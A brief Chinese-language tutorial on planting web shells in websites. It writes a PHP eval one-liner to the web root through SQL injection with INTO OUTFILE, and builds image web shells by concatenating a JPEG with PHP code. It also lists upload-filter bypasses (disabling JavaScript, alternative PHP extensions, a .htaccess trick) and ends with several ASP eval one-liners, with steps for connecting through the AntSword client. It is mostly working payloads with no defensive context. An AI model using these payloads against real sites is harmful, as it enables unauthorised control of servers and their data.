文件马上传
找注入点,判断类型,确认回显点后写入一句木马连接蚁剑
?id=32 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,"<?php eval($_POST['jm']);?>",12,13,14,15 into outfile "/var/www/html/jm.php"
查询一下jm.php是否已经上传
右键添加数据
把我们上传的地址写上去,连接密码是我们一句话木马上自己设置的,为jm
点添加,然后进去
进入目录管理
就可以进行一系列操作了
修改数据,上传文件等等
图片马上传
方法一
首先新建一个文件后缀名改为.php,再找一张图片,名字分别改为1.php和1.jpg
打开1.php写入一句话木马
使用以下命令
copy 1.jpg/b + 1.php/a 2.jpg
得到2.jpg
a为ASCII , b为Binary(二进制)
接下来就可以传了,把我们做好的图片马上传
然后右键图片复制图片地址链接
进入该地址链接检查图片马上否成功上传
发现可以访问,图片需要进行解析,先burp抓包
将2.jpg改成2.php然后访问一下,访问成功就说明传马成功,上蚁剑
方法二
禁用js,就可以直接上传1.php,然后直接蚁剑
畸形后缀
php php3 php4 php5 php7 pht phtml phar phps
.htaccess文件(超文本上传)
先上传一个.htaccess文件
然后上传图片马,解析成功以后上蚁剑
asp一句话木马
<%execute request("chopper")%>
<%eval request("chopper")%>
<%execute(request("chopper"))%>
<%ExecuteGlobal request("chopper")%>